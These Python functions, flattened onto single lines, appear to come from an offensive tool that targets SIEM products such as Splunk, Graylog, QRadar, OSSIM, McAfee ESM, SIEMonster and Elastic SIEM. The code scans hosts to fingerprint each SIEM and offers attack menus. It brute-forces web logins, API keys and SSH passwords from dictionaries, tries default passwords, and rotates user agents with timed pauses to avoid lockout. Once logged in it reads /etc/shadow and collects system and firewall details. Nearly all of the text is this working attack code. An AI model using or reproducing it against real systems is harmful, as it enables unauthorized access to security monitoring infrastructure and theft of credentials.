def qradar_apikeybrute(ip, port): __location__ = os.path.realpath( os.path.join(os.getcwd(), os.path.dirname(__file__))) if os.path.isfile(os.path.join(__location__, keys)): file = open(os.path.join(__location__, keys)) else: cant = input( Fore.CYAN + Style.BRIGHT + "[!] Enter the number of apikeys you want in the dictionary: " + Style.RESET_ALL) try: api_dict(cant) file = open(os.path.join(__location__, keys)) except: globals.qradar_messages(1) bfs = 0 for line in file: api = line.strip('\n\r') url = globals.https + ip + ":" + str(port) + "/api/system/servers" headers = {'SEC': api} if requests.get(url, headers=headers, verify=False).status_code == 200: globals.messages(7) globals.qradar_messages(2, api) bfs = 1 file.close() break if bfs == 0: globals.messages(8) file.close()
def smonster_ssh_info(ip): password = input(Fore.CYAN + Style.NORMAL + "[!] Enter SIEMonster deploy's password: "******"hostname", "[!] Hostname"), ("docker ps --format \"table {{.Names}}\t{{.Ports}}\t" "{{.Status}}\"", "[!] Active Containers"), ("ls -1 /etc/rc5.d", "[!] List service active"), ("ifconfig", "[!] Network Configuration"), ("sudo iptables -nL", "[!] FW Configuration")] for command in commands: stdin, stdout, stderr = ssh.exec_command(command[0]) if stdout != "": print('') print(Fore.GREEN + Style.NORMAL + command[1]) print(Fore.GREEN + Style.NORMAL + SEPARATOR + Style.RESET_ALL) for i in stdout.readlines(): print('[!] ' + i.replace('\n', '')) except paramiko.AuthenticationException: globals.messages(10) ssh.close()
def menus(menu): globals.messages(1, '') if menu == 1: options = enumerate(globals.main_menu, 1) elif menu == "Splunk": options = enumerate(globals.splunk_menu, 1) elif menu == "Graylog": options = enumerate(globals.graylog_menu, 1) elif menu == "OSSIM": options = enumerate(globals.ossim_menu, 1) elif menu == "QRadar": options = enumerate(globals.qradar_menu, 1) elif menu == "McAfee": options = enumerate(globals.mcafee_menu, 1) elif menu == "SIEMonster": options = enumerate(globals.smonster_menu, 1) elif menu == "ElasticSIEM": options = enumerate(globals.elastic_menu, 1) elif menu == 2: options = enumerate(globals.app_menu, 1) for c, i in options: print(Fore.GREEN + Style.BRIGHT + '\t[' + str(c) + '] ' + i) if menu == 1: print(Fore.GREEN + Style.BRIGHT + '\t[X] Exit') elif menu == 2: print(Fore.GREEN + Style.BRIGHT + '\t[X] Return to Attack Menu') else: print(Fore.GREEN + Style.BRIGHT + '\t[X] Return to Main Menu') print(Fore.GREEN + Style.BRIGHT + SEPARATOR) choice = input( Fore.CYAN + Style.NORMAL + "[!] Enter your selection: " + Style.RESET_ALL) return choice
def scan_detect(): ip = input_ip() port = input_port() siemdetected = '' if (ip and port) != '': siemdetected = scan_host(ip, port) else: globals.messages(3) sleep(1) main_choice() choice2 = input( Fore.CYAN + Style.BRIGHT + "[!] Do you want to launch the " + siemdetected + " attack module (Y/N): " + Style.RESET_ALL) if choice2.lower() == "y": if port == 0 and siemdetected == "Splunk": attack_choice(siemdetected, ip, '8089') elif port == 0 and siemdetected == "Graylog": attack_choice(siemdetected, ip, '9000') elif port == 0 and ( siemdetected == "OSSIM" or siemdetected == "QRadar" or siemdetected == "McAfee" or siemdetected == "SIEMonster"): attack_choice(siemdetected, ip, '443') else: attack_choice(siemdetected, ip, port) else: main_choice()
def find_siem(): siemsdetected = {} siemnet = input_net() if re.search(globals.net_val, siemnet): ips = scan_network(siemnet) else: globals.messages(4) sleep(1) main_choice() globals.messages(6) for host in ips: siemdetected = scan_host(host, '0') siemsdetected[host] = siemdetected siemchoice = input( Fore.CYAN + Style.BRIGHT + "[!] Enter the IP address of the SIEM to attack: " + Style.RESET_ALL) portchoice = input( Fore.CYAN + Style.BRIGHT + "[!] Enter the port of the SIEM to attack: " + Style.RESET_ALL) choice2 = input( Fore.CYAN + Style.BRIGHT + "[!] Do you want to launch the " + siemsdetected[siemchoice] + " attack module (Y/N): " + Style.RESET_ALL) if choice2.lower() == "y": attack_choice(siemsdetected[siemchoice], siemchoice, portchoice) else: main_choice()
def attack_choice(siemdetected, ip, port): choiceerror = 0 attackchoice = menus(siemdetected) if siemdetected == "Splunk": splunk_attack(attackchoice, ip, port) elif siemdetected == "Graylog": graylog_attack(attackchoice, ip, port) elif siemdetected == "OSSIM": ossim_attack(attackchoice, ip, port) elif siemdetected == "QRadar": qradar_attack(attackchoice, ip, port) elif siemdetected == "McAfee": mcafee_attack(attackchoice, ip, port) elif siemdetected == "SIEMonster": smonster_attack(attackchoice, ip, port) elif siemdetected == "ElasticSIEM": elastic_attack(attackchoice, ip, port) elif attackchoice.lower() == "x": main_choice() else: globals.messages(2) sleep(1) attack_choice(siemdetected, ip, port) choiceerror = 1 if attackchoice != "0" and choiceerror != 1: # Not return and not error choice3 = input( Fore.CYAN + Style.BRIGHT + "[!] Do you want to return to the attack menu (Y/N): " + Style.RESET_ALL) if choice3.lower() == "y": attack_choice(siemdetected, ip, port) else: main_choice()
def smonster_ssh_bf(ip): __location__ = os.path.realpath( os.path.join(os.getcwd(), os.path.dirname(__file__))) file = open(os.path.join(__location__, 'dict.txt')) nm = nmap.PortScanner() bps = 0 try: nm.scan(hosts=ip, arguments='-sT -T4 -p 22') if nm[ip]['tcp'][22]['state'] == 'open': for line in file: password = line.strip('\n\r') if ssh_credentials(ip, password): mess = ['deploy', password] globals.messages(7) globals.messages(9, mess) file.close() bps = 1 break if bps == 0: globals.messages(8) file.close() else: globals.messages(8) file.close() except Exception as e: globals.messages(8) file.close() logging.error(e, exc_info=True)
def smonster_users_server(ip): password = input(Fore.CYAN + Style.NORMAL + "[!] Enter SIEMonster deploy's password: "******"sudo cat /etc/shadow") std.flush() shadow_file = stdout.readlines() globals.smonster_messages(2) for line in shadow_file: print('[!] ' + line.replace('\n', '')) ssh.close() except paramiko.AuthenticationException: globals.messages(10) ssh.close()
def elastic_ssh_brute(ip): username = input(Fore.CYAN + Style.NORMAL + "[!] Enter username of operations system: ") __location__ = os.path.realpath( os.path.join(os.getcwd(), os.path.dirname(__file__))) file = open(os.path.join(__location__, 'dict.txt')) nm = nmap.PortScanner() bps = 0 if username == '': username = '******' try: nm.scan(hosts=ip, arguments='-sT -T4 -p 22') if nm[ip]['tcp'][22]['state'] == 'open': for line in file: password = line.strip('\n\r') if ssh_credentials(ip, password, username): mess = [username, password] globals.messages(7) globals.messages(9, mess) file.close() bps = 1 break if bps == 0: globals.messages(8) file.close() else: globals.messages(8) file.close() except Exception as e: globals.messages(8) file.close() logging.error(e, exc_info=True)
def graylog_detect(siemip, siemport): url = http + siemip + ":" + siemport try: response = requests.get(url) if "Graylog Web Interface" in response.text: siemdetected = "Graylog" globals.messages(5, [siemdetected, siemport]) return siemdetected except Exception as e: logging.error(e, exc_info=True)
def splunk_detect(siemip, siemport): url = https + siemip + ":" + siemport try: response = requests.get(url, verify=False) if "splunkd" in response.text: siemdetected = "Splunk" globals.messages(5, [siemdetected, siemport]) return siemdetected except Exception as e: logging.error(e, exc_info=True)
def ossim_detect(siemip, siemport): url = https + siemip + ":" + siemport + "/ossim/session/login.php" try: response = requests.get(url, verify=False) if "AlienVault OSSIM" in response.text: siemdetected = "OSSIM" globals.messages(5, [siemdetected, siemport]) return siemdetected except Exception as e: logging.error(e, exc_info=True)
def qradar_detect(siemip, siemport): url = https + siemip + ":" + siemport + "/console/" try: response = requests.get(url, verify=False) if "QRadar" in response.headers['Server']: siemdetected = "QRadar" globals.messages(5, [siemdetected, siemport]) return siemdetected except Exception as e: logging.error(e, exc_info=True)
def smonster_detect(siemip, siemport): url = https + siemip + ":" + siemport try: response = requests.get(url, verify=False) if 'title>SIEMonster ' in response.text: siemdetected = "SIEMonster" globals.messages(5, [siemdetected, siemport]) return siemdetected except Exception as e: logging.error(e, exc_info=True)
def mcafee_detect(siemip, siemport): url = https + siemip + ":" + siemport try: response = requests.get(url, verify=False) if 'McAfee' in response.text and 'SIEM' in response.text: siemdetected = "McAfee" globals.messages(5, [siemdetected, siemport]) return siemdetected except Exception as e: logging.error(e, exc_info=True)
def bruteforce_splunk(ip, port): username = "******" __location__ = os.path.realpath( os.path.join(os.getcwd(), os.path.dirname(__file__))) file = open(os.path.join(__location__, 'dict.txt')) bfs = 0 free = 0 defaultpass = 0 # First Try Default Password "changeme" and Splunk Free Version try: client.connect(host=ip, port=port, username=username, password="") free = 1 except: pass try: client.connect(host=ip, port=port, username=username, password="******") defaultpass = 1 except: pass if (free and defaultpass) == 0: for line in file: splunk_password = line.strip('\n\r') try: client.connect(host=ip, port=port, username=username, password=splunk_password) bfs = 1 break except: pass if (bfs or free or defaultpass) == 1: globals.messages(7) if free == 1: globals.messages(9, ['admin', 'no password']) file.close() elif defaultpass == 1: globals.messages(9, ['admin', 'changeme']) file.close() else: globals.messages(9, ['admin', splunk_password]) file.close() else: globals.messages(8) file.close()
def mcafee_webinfo(ip, port): agents = 'Mozilla/5.0 (X11; Linux x86_64) Gecko/20100101 Firefox/47.0' a = 0 password = input( Fore.CYAN + Style.NORMAL + "[!] Enter password of the user Web NGCP: " + Style.RESET_ALL) url1 = globals.https + ip + ":" + str(port) + "/ess" url2 = globals.https + ip + ":" + str(port) + "/rs/esm/v2/login" url3 = globals.https + ip + ":" + str(port) + "/rs/v1/systemInformation" headers = { 'Accept': 'application/json,text/plain,*/*', 'DNT': '1', 'Host': ip, 'Origin': globals.https + ip, 'Referer': globals.https + ip, 'User-Agent': agents[a], 'Content-Type': 'application/json;charset=utf-8', 'Connection': 'keep - alive', 'X-Xsrf-Token': 'null' } params = { 'username': '******', 'password': str(base64.b64encode(password.encode('utf-8')), 'utf-8'), 'locale': 'en_US', 'os': "Linux x86_64" } json_params = json.dumps(params).encode('utf-8') data_show = [ 'callHomeIp', 'releaseNumber', 'hdd', 'ram', 'processor', 'esssystemTime', 'statusAndAlertNextCheckIn', 'rulesAndSoftNextCheck', 'backupNextTime' ] try: requests.post( url1, data='Request=API%13CAC%5FLOGIN%13%14', headers=headers, verify=False) headers['Accept'] = 'application/json' response = requests.post( url2, data=json_params, headers=headers, verify=False) if response.status_code == 201: headers['Cookie'] = response.headers['Set-Cookie'] headers['X-Xsrf-Token'] = response.headers['xsrf-token'] response2 = requests.get(url3, headers=headers, verify=False) globals.mcafee_messages(1) data = json.loads(response2.text) for field in data_show: if data[field] != "": print('[!] ' + field + ': ' + str(data[field])) else: globals.messages(10) except Exception as e: logging.error(e, exc_info=True)
def elasticsiem_detect(siemip, siemport): url = http + siemip + ":" + siemport + '/app/siem' try: response = requests.get(url) if "Elastic" in response.text and "elasticsiem" in response.headers[ 'kbn-name']: siemdetected = "ElasticSIEM" globals.messages(5, [siemdetected, siemport]) return siemdetected except Exception as e: logging.error(e, exc_info=True)
def ova_credentials(ip, user, password): ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) mess = [user, password] try: ssh.connect(ip, username=user, password=password) globals.splunk_messages(10) globals.messages(9, mess) except paramiko.AuthenticationException: globals.splunk_messages(11, mess)
def main_choice(): choice = menus(1) if choice == "1": # Scan and Detect SIEM scan_detect() elif choice == "2": # Find SIEM on the Network find_siem() elif choice.upper() == "X": quit() else: globals.messages(2) main_choice()
def graylog_brute(ip, port): url = \ globals.http + ip + ":" + str(port) + "/api/system/sessions" __location__ = os.path.realpath( os.path.join(os.getcwd(), os.path.dirname(__file__))) files = open(os.path.join(__location__, 'dict.txt')) bruteforcesuccesfull = 0 for line in files: password = line.strip('\n\r') params = {'username': '******', 'password': password, 'host': ip} headers = {'X-Requested-By': 'XMLHttpRequest'} try: response = requests.post(url, json=params, headers=headers, verify=False) if response.status_code == 200: globals.messages(7) mess = ['admin', password] globals.messages(9, mess) bruteforcesuccesfull = 1 files.close() break except Exception as e: logging.error(e, exc_info=True) files.close() if not bruteforcesuccesfull: globals.messages(8)
def mcafee_users_server(ip): password = input( Fore.CYAN + Style.NORMAL + "[!] Enter McAfee root's password: " + Style.RESET_ALL) ssh = paramiko.SSHClient() ssh.load_system_host_keys() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) try: ssh.connect(ip, username='******', password=password, banner_timeout=200) sftp = ssh.open_sftp() shadow_file = sftp.open('/etc/shadow') globals.mcafee_messages(2) for line in shadow_file: print('[!] ' + line.replace('\n', '')) shadow_file.close() ssh.close() except paramiko.AuthenticationException: globals.messages(10) ssh.close()
def elastic_ssh_info(ip): username = input(Fore.CYAN + Style.NORMAL + "[!] Enter ElasticSIEM's username: "******"[!] Enter ElasticSIEM's password: "******"hostname", "[!] Hostname"), ("ls -1 /etc/rc5.d", "[!] List service active"), ("ifconfig", "[!] Network Configuration"), ('netstat -putan | grep LISTEN', "[!] Ports active")] for command in commands: std, stdout, stderr = ssh.exec_command(command[0]) if stdout != "": print('') print(Fore.GREEN + Style.NORMAL + command[1]) print(Fore.GREEN + Style.NORMAL + globals.SEPARATOR + Style.RESET_ALL) for i in stdout.readlines(): print('[!] ' + i.replace('\n', '')) ssh.close() except paramiko.AuthenticationException: globals.messages(10) ssh.close()
def ossim_brute(ip, port): url = globals.https + ip + ":" + str(port) + "/ossim/session/login.php" __location__ = os.path.realpath( os.path.join(os.getcwd(), os.path.dirname(__file__))) file = open(os.path.join(__location__, 'dict.txt')) successurl = globals.https + ip + "/ossim/" bruteforceresult = 0 for line in file: ossimpassword = line.strip('\n\r') ossimpasswordb64 = base64.b64encode(ossimpassword.encode("utf-8")) base64string = str(ossimpasswordb64, "utf-8") params = { 'embed': '', 'bookmark_string': '', 'user': '******', 'passu': ossimpassword, 'pass': base64string } try: response = requests.post(url, params=params, verify=False) if response.status_code == 302 or response.url == successurl: globals.messages(7) mess = ['admin', ossimpassword] globals.messages(9, mess) bruteforceresult = 1 file.close() break except Exception as e: logging.error(e, exc_info=True) if not bruteforceresult: globals.messages(8) file.close()
def qradar_brute(ip, port): __location__ = os.path.realpath( os.path.join(os.getcwd(), os.path.dirname(__file__))) file = open(os.path.join(__location__, 'dict.txt')) bfs = 0 url_base = globals.https + ip + ":" + str(port) agents = [ 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, ' 'like Gecko) Chrome/79.0.3945.88 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) ' 'Gecko/20100101 Firefox/47.0', 'Mozilla/5.0 (Macintosh; Intel Mac OS X x.y; rv:42.0) ' 'Gecko/20100101 Firefox/42.0', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, ' 'like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) ' 'AppleWebKit/603.1.30 (KHTML, like Gecko)' ' Version/10.0 Mobile/14E304 Safari/602.1' ] a = 0 for line in file: password = line.strip('\n\r') url = url_base + "/console/" session = requests.Session() headers = {'user-agent': agents[a]} response = session.get(url, headers=headers, verify=False) headers = {'user-agent': agents[a], 'QRadarCSRF': 'null'} qradarcsrf = response.headers[ 'Set-Cookie'][response.headers['Set-Cookie'].find('CSRF=') + 5:response.headers['Set-Cookie'].find('; Max')] params = { 'j_username': '******', 'j_password': password, 'LoginCSRF': qradarcsrf } auth = url_base + "/console/j_security_check" try: response2 = session.post(auth, data=params, headers=headers, verify=False) if response2.url == url_base + "/console/core/jsp/Main.jsp" or response2.status_code == 322: globals.messages(7) globals.messages(9, ['admin', password]) bfs = 1 file.close() break else: if a <= 3: a += 1 else: time.sleep(1800) a = 0 except Exception as e: logging.error(e, exc_info=True) if bfs == 0: globals.messages(8) file.close()
def mcafee_brute(ip, port): __location__ = os.path.realpath( os.path.join(os.getcwd(), os.path.dirname(__file__))) file = open(os.path.join(__location__, 'dict.txt')) bruteforcesuccesfull = 0 https = "https://" agents = [ 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML,' ' like Gecko) Chrome/79.0.3945.88 Safari/537.36', 'Mozilla/5.0 (X11; Linux x86_64) Gecko/20100101 Firefox/47.0', 'Mozilla/5.0 (X11; Linux x86_64) Gecko/20100101 Firefox/42.0', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML,' ' like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41' ] a = 0 for line in file: password = line.strip('\n\r') url1 = https + ip + ":" + str(port) + "/ess" url2 = https + ip + ":" + str(port) + "/rs/esm/v2/login" headers = { 'Accept': 'application/json,text/plain,*/*', 'DNT': '1', 'Host': ip, 'Origin': 'https://' + ip, 'Referer': 'https://' + ip, 'User-Agent': agents[a], 'Content-Type': 'application/json;charset=utf-8', 'Connection': 'keep - alive', 'X-Xsrf-Token': 'null' } params = { 'username': '******', 'password': str(base64.b64encode(password.encode('utf-8')), 'utf-8'), 'locale': 'en_US', 'os': "Linux x86_64" } json_params = json.dumps(params).encode('utf-8') try: response = requests.post( url1, data='Request=API%13CAC%5FLOGIN%13%14', headers=headers, verify=False) if response.status_code == 200: headers['Accept'] = 'application/json' response2 = requests.post( url2, data=json_params, headers=headers, verify=False) if response2.status_code == 201: globals.messages(7) mess = ['NGCP', password] globals.messages(9, mess) bruteforcesuccesfull = 1 break else: if a <= 2: a += 1 else: time.sleep(360) a = 0 except Exception as e: logging.error(e, exc_info=True) if not bruteforcesuccesfull: globals.messages(8)